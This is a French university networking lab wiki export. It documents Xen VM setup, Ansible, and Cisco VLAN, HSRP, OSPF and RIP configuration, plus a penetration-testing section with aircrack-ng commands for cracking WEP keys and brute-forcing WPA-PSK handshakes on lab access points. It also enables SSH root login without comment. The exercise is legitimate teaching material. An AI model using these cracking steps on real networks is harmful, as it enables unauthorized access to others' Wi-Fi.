&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52005</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52005"/>
				<updated>2020-01-05T14:47:56Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du commutateur 1 (COM-1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
